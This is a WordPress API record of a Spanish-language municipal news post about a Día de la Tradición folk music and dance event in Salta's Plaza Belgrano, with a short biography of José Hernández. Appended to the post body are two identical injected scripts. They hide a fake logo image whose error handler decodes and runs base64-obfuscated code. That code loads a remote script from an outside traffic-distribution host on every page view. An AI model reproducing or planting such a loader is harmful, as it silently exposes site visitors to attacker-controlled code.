{"id":1771,"date":"2022-11-10T18:25:38","date_gmt":"2022-11-10T21:25:38","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1771"},"modified":"2025-08-14T00:30:33","modified_gmt":"2025-08-14T03:30:33","slug":"la-municipalidad-celebro-el-dia-de-la-tradicion-en-plaza-belgrano","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1771","title":{"rendered":"La Municipalidad celebr\u00f3 el D\u00eda de la Tradici\u00f3n en plaza Belgrano"},"content":{"rendered":"\n<h4 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#5f051c\"><strong><em>Turistas y vecinos disfrutaron de un show en vivo de m\u00fasica y danza. Fue de la mano de la Banda de M\u00fasica municipal \u00ab25 de Mayo\u00bb y el Ballet \u201cMama Quilla\u201d de Villa Chartas que llenaron de color la jornada.<\/em><\/strong><\/h4>\n\n\n\n<p>La Municipalidad de Salta a trav\u00e9s de la Secretar\u00eda de Cultura y Turismo realiz\u00f3 en el mediod\u00eda de este 10 de noviembre una actividad por el Dia de la Tradici\u00f3n en la Plaza Belgrano.<\/p>\n\n\n\n<p>La Banda de M\u00fasica municipal \u00ab25 de Mayo\u00bb&nbsp; junto al Ballet \u201cMama Quilla\u201d de Villa Chartas, realizaron cuadros y bailes folkl\u00f3ricos, incluyendo el peric\u00f3n nacional, para recordar la fecha del natalicio de Jos\u00e9 Hern\u00e1ndez.<\/p>\n\n\n\n<p>Al respecto el subsecretario de Cultura municipal, Rolando Arias expres\u00f3: \u00abEstamos dandole un poco de color al festejo del D\u00eda de la Tradici\u00f3n, de esta manera recordamos este dia a salte\u00f1os y turistas que nos visitan. Hay distintos formatos de eventos culturales y esta actividad, peque\u00f1a, es un momento distinto que permite disfrutar de nuestra m\u00fasica y nuestra danza, es un alto en las actividades\u00bb<\/p>\n\n\n\n<p>\u00abLa tradici\u00f3n es algo que llevamos en el alma es un sentir propio que vienen de los antepasados y tenemos que inculcarle a nuestros j\u00f3venes, para que se mantengan las tradiciones\u00bb&nbsp; dijo Margarita, bailarina del grupo de adultos mayores de la biblioteca Juan Carlos D\u00e1valos<\/p>\n\n\n\n<p>Adem\u00e1s de los vecinos, muchos turistas que visitan la ciudad se acercaron para disfrutar del espect\u00e1culo. \u201cVenimos de Mar del Plata, bajamos de hacer una excursi\u00f3n y vimos este movimiento colorido, as\u00ed que buscamos el mate para hacer honor al d\u00eda y aqu\u00ed estamos disfrutando Salta que no conoc\u00edamos\u00bb, mencionaron las turistas.&nbsp;&nbsp;&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"1772\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/IMG_20221110_113917-1024x768.jpg\" alt=\"\" class=\"wp-image-1772\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/IMG_20221110_113917-1024x768.jpg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/IMG_20221110_113917-300x225.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/IMG_20221110_113917-768x576.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/IMG_20221110_113917-1536x1152.jpg 1536w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/IMG_20221110_113917-2048x1536.jpg 2048w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/IMG_20221110_113917-696x522.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/IMG_20221110_113917-1068x801.jpg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/IMG_20221110_113917-1920x1440.jpg 1920w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/IMG_20221110_113917-560x420.jpg 560w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/IMG_20221110_113917-80x60.jpg 80w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/IMG_20221110_113917-265x198.jpg 265w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"1773\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/IMG_20221110_115050-1024x768.jpg\" alt=\"\" class=\"wp-image-1773\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/IMG_20221110_115050-1024x768.jpg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/IMG_20221110_115050-300x225.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/IMG_20221110_115050-768x576.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/IMG_20221110_115050-1536x1152.jpg 1536w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/IMG_20221110_115050-2048x1536.jpg 2048w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/IMG_20221110_115050-696x522.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/IMG_20221110_115050-1068x801.jpg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/IMG_20221110_115050-1920x1440.jpg 1920w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/IMG_20221110_115050-560x420.jpg 560w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/IMG_20221110_115050-80x60.jpg 80w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/IMG_20221110_115050-265x198.jpg 265w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"1774\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/IMG_20221110_115102-1024x768.jpg\" alt=\"\" class=\"wp-image-1774\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/IMG_20221110_115102-1024x768.jpg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/IMG_20221110_115102-300x225.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/IMG_20221110_115102-768x576.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/IMG_20221110_115102-1536x1152.jpg 1536w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/IMG_20221110_115102-2048x1536.jpg 2048w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/IMG_20221110_115102-696x522.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/IMG_20221110_115102-1068x801.jpg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/IMG_20221110_115102-1920x1440.jpg 1920w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/IMG_20221110_115102-560x420.jpg 560w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/IMG_20221110_115102-80x60.jpg 80w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/IMG_20221110_115102-265x198.jpg 265w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p><strong>Sobre Jos\u00e9 Rafael Hern\u00e1ndez&nbsp;<\/strong><\/p>\n\n\n\n<p>Naci\u00f3 en Chacras de Perdriel, un 10 de noviembre de 1834, fue un poeta, pol\u00edtico, periodista y militar argentino, especialmente conocido como el autor del&nbsp;<em>Mart\u00edn Fierro<\/em>, obra m\u00e1xima de la literatura gauchesca.<em>&nbsp;En su homenaje, el 10 de noviembre se festeja en la Argentina el D\u00eda de la Tradici\u00f3n.<\/em><\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-2 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" data-id=\"1775\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/dia-de-la-tradicion-1024x683.jpg\" alt=\"\" class=\"wp-image-1775\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/dia-de-la-tradicion-1024x683.jpg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/dia-de-la-tradicion-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/dia-de-la-tradicion-768x512.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/dia-de-la-tradicion-696x464.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/dia-de-la-tradicion-1068x713.jpg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/dia-de-la-tradicion-630x420.jpg 630w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/dia-de-la-tradicion.jpg 1367w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" data-id=\"1776\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/dia-de-la-tradicion-3-1-1024x683.jpg\" alt=\"\" class=\"wp-image-1776\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/dia-de-la-tradicion-3-1-1024x683.jpg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/dia-de-la-tradicion-3-1-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/dia-de-la-tradicion-3-1-768x512.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/dia-de-la-tradicion-3-1-696x464.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/dia-de-la-tradicion-3-1-1068x713.jpg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/dia-de-la-tradicion-3-1-630x420.jpg 630w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/dia-de-la-tradicion-3-1.jpg 1367w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" data-id=\"1777\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/banda-de-musica-municipal-2-1024x683.jpg\" alt=\"\" class=\"wp-image-1777\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/banda-de-musica-municipal-2-1024x683.jpg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/banda-de-musica-municipal-2-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/banda-de-musica-municipal-2-768x512.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/banda-de-musica-municipal-2-696x464.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/banda-de-musica-municipal-2-1068x713.jpg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/banda-de-musica-municipal-2-630x420.jpg 630w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/banda-de-musica-municipal-2.jpg 1367w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Turistas y vecinos disfrutaron de un show en vivo de m\u00fasica y danza. Fue de la mano de la Banda de M\u00fasica municipal \u00ab25 de Mayo\u00bb y el Ballet \u201cMama Quilla\u201d de Villa Chartas que llenaron de color la jornada. La Municipalidad de Salta a trav\u00e9s de la Secretar\u00eda de Cultura y Turismo realiz\u00f3 en [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1775,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26],"tags":[],"class_list":{"0":"post-1771","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1771"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1771"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1771\/revisions"}],"predecessor-version":[{"id":7280,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1771\/revisions\/7280"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1775"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1771"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1771"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1771"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}